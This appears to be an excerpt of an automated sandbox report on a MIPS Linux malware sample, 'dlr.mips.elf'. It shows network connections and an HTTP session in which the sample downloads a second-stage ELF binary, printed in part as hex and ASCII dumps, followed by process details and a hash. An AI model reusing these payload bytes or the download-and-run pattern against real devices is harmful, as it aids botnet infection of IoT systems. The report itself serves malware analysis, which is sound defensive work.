                                              Jan 8, 2025 19:32:59.476001978 CET42836443192.168.2.2391.189.91.43
                                              Jan 8, 2025 19:33:01.011738062 CET4251680192.168.2.23109.202.202.202
                                              Jan 8, 2025 19:33:15.345751047 CET43928443192.168.2.2391.189.91.42
                                              Jan 8, 2025 19:33:25.584326982 CET42836443192.168.2.2391.189.91.43
                                              Jan 8, 2025 19:33:31.727739096 CET4251680192.168.2.23109.202.202.202
                                              Jan 8, 2025 19:33:56.300537109 CET43928443192.168.2.2391.189.91.42
                                              • 127.0.0.1
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.2333752103.136.41.10080
                                              TimestampBytes transferredDirectionData
                                              Jan 8, 2025 19:32:51.721743107 CET92OUTGET /12 HTTP/1.1
                                              Host: 127.0.0.1
                                              Connection: close
                                              User-Agent: wget (dlr)
                                              Jan 8, 2025 19:32:52.320096016 CET731INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Content-Length: 102688
                                              Content-Type: application/octet-stream
                                              Last-Modified: Wed, 08 Jan 2025 16:59:29 GMT
                                              Date: Wed, 08 Jan 2025 18:32:52 GMT
                                              Connection: close
                                              Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 70 00 00 00 34 00 01 8e c8 00 00 10 07 00 34 00 20 00 03 00 28 00 0f 00 0e 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 84 90 00 01 84 90 00 00 00 05 00 01 00 00 00 00 00 01 00 01 84 90 00 45 84 90 00 45 84 90 00 00 09 c8 00 00 33 38 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 3c 1c 00 06 27 9c 08 bc 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 08 98 03 9f e0 21 8f 99 80 1c 00 00 00 00 27 39 01 dc 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 08 68 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 6b 30 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 00 08 27 bd 00 20 3c 1c 00 06 27 9c 08 30 03 99 e0 21 27 bd ff d8 af bf 00 20 af b1 00 1c af b0 00 18 af bc 00 10 8f 91 80 18 00 00 00 00 92 22 8e 70 00 00 00 00 14 40 [TRUNCATED]
                                              Data Ascii: ELF@p44 (@@EE38dtQ<'!'<'!'9 <'h! '9k0 ' <'0!' "p@Y $B Y $B@$ $$"p '(<'t!'h@
                                              Jan 8, 2025 19:32:52.320342064 CET1236INData Raw: 00 00 00 00 8f 84 80 18 8f 85 80 18 8f 99 81 68 24 84 84 90 03 20 f8 09 24 a5 8e 74 8f bc 00 10 00 00 00 00 8f 84 80 18 00 00 00 00 8c 82 84 a4 00 00 00 00 10 40 00 08 00 00 00 00 8f 99 81 7c 00 00 00 00 13 20 00 04 24 84 84 a4 8f bf 00 18 03 20
                                              Data Ascii: h$ $t@| $ ' ' !<'!!'$$' <'p!'
                                              Jan 8, 2025 19:32:52.320404053 CET1236INData Raw: 8f 99 84 04 8f 90 82 0c 03 20 98 21 8f 99 82 bc 26 11 00 a0 10 00 00 04 03 20 90 21 26 10 00 10 12 11 00 16 00 00 00 00 8e 02 00 00 00 00 00 00 10 40 ff fa 02 40 c8 21 03 20 f8 09 00 00 20 21 8e 03 00 08 96 04 00 0c 00 43 10 23 00 82 10 2b 8f bc
                                              Data Ascii: !& !&@@! !C#+@ !(!$`! &($ '0<'!00F$@!b$c%`(!!
                                              Jan 8, 2025 19:32:52.320453882 CET1236INData Raw: 14 40 ff e8 24 d1 00 06 8f 99 83 e8 02 c0 20 21 24 05 00 18 03 20 f8 09 00 60 a8 21 af a2 00 2c 8f bc 00 18 12 c0 00 21 00 40 80 21 8f 99 82 f4 00 00 00 00 03 20 98 21 00 00 90 21 10 00 00 0f 27 b4 00 20 8e 22 00 00 00 00 00 00 ae 02 00 10 00 40
                                              Data Ascii: @$ !$ `!,!@! !!' "@ !"$&R&1&V&2"@ ! (!`! $ @ !%&!,`T ` !`!T
                                              Jan 8, 2025 19:32:52.320513964 CET1236INData Raw: 24 a5 00 01 ae 23 00 00 a2 22 00 04 03 20 f8 09 00 05 28 80 92 04 00 00 8f bc 00 10 00 04 18 80 8f 99 83 e8 00 62 18 21 24 84 00 01 ac 71 00 00 ae 42 00 00 a2 04 00 00 24 05 00 08 03 20 f8 09 24 04 00 01 8f bc 00 10 92 05 00 00 8f 83 82 80 8f 99
                                              Data Ascii: $#" (b!$qB$ $<@!D$$#" (b!$qB$ $x<@!D$$#" (b!$qB
                                              Jan 8, 2025 19:32:52.320573092 CET956INData Raw: 00 40 a8 21 8f bc 00 18 02 00 28 21 8f 99 82 70 02 20 20 21 24 06 00 04 00 00 38 21 03 20 f8 09 00 40 a0 21 8f bc 00 18 02 00 28 21 8f 82 83 a4 8f 99 84 80 8c 47 00 00 02 20 20 21 03 20 f8 09 24 06 00 03 8f bc 00 18 af a2 00 90 8f 99 84 44 24 04
                                              Data Ascii: @!(!p !$8! @!(!G ! $D$$ $$P' $$ (! $P0c0/ 322f2G2
                                              Jan 8, 2025 19:32:52.320585966 CET1236INData Raw: 00 02 10 80 00 44 10 21 8c 43 00 20 03 20 f8 09 a3 a3 00 27 3c 04 aa aa 34 84 aa ab 00 44 00 19 8f bc 00 18 02 40 c8 21 00 00 18 10 00 03 18 82 00 03 20 c0 00 03 18 40 00 83 20 23 00 44 10 23 24 42 00 06 03 20 f8 09 a3 a2 00 2b 3c 03 10 62 34 63
                                              Data Ascii: D!C '<4D@! @ #D#$B +<b4cMC@! !(e#d!@C#$B 0<b4cMC@! !(e#d!@C#$B 1<b4cMC@! !(e
                                              Jan 8, 2025 19:32:52.320621967 CET1236INData Raw: 8f bc 00 18 10 00 ff 6e a6 82 00 02 3c 1c 00 06 27 9c eb ac 03 99 e0 21 27 bd ff 70 af bf 00 8c af be 00 88 af b7 00 84 af b6 00 80 af b5 00 7c af b4 00 78 af b3 00 74 af b2 00 70 af b1 00 6c af b0 00 68 af bc 00 18 8f 99 83 e8 30 95 00 ff af a5
                                              Data Ascii: n<'!'p|xtplh0 !$! 0(!p !$4 D(!p !$4 @(!p !$8! <(!p !$8! 8(!
                                              Jan 8, 2025 19:32:52.320632935 CET1236INData Raw: 8f a3 00 94 00 00 00 00 00 43 28 21 00 04 18 80 8f a4 00 44 90 a2 00 14 00 64 18 21 8c 71 00 00 2c 42 00 20 14 40 00 53 26 32 00 14 8f a4 00 28 24 02 ff ff 10 82 00 63 02 60 c8 21 03 20 f8 09 34 10 ff ff 8f bc 00 18 a6 22 00 04 8f a2 00 34 00 00
                                              Data Ascii: C(!Dd!q,B @S&2($c`! 4"4Pg`!0Pk`! B,@p`! !$! !"@(!$($(! @ E!@ # !B$$
                                              Jan 8, 2025 19:32:52.320657969 CET1236INData Raw: af a7 00 54 af a8 00 58 af a9 00 5c 00 00 80 21 24 04 00 80 02 a0 c8 21 03 20 f8 09 24 05 00 01 8f a5 00 20 8f a4 00 44 8f b9 00 44 00 10 18 80 00 64 18 21 00 05 20 80 8f bc 00 18 00 99 20 21 ac 62 00 00 8c 90 00 00 3c 03 40 00 8e 02 00 00 24 13
                                              Data Ascii: TX\!$! $ DDd! !b<@$V$C%W$<C%$@(!@( # !4$<&<V$<C%79HY$<C%79LY$<
                                              Jan 8, 2025 19:32:52.324987888 CET1236INData Raw: 24 06 00 01 34 07 ff ff 03 20 f8 09 af a2 00 44 8f bc 00 18 02 00 28 21 8f 99 82 70 02 20 20 21 24 06 00 02 34 07 ff ff 03 20 f8 09 af a2 00 40 8f bc 00 18 02 00 28 21 8f 99 82 70 02 20 20 21 24 06 00 08 00 00 38 21 03 20 f8 09 af a2 00 3c 8f bc
                                              Data Ascii: $4 D(!p !$4 @(!p !$8! <(!p !$$ @!(!p !$8! @!(!p !$8! @!(!p !$8! @!(!p !$8! @!


                                              System Behavior

                                              Start time (UTC):18:32:50
                                              Start date (UTC):08/01/2025
                                              Path:/tmp/dlr.mips.elf
                                              Arguments:/tmp/dlr.mips.elf
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c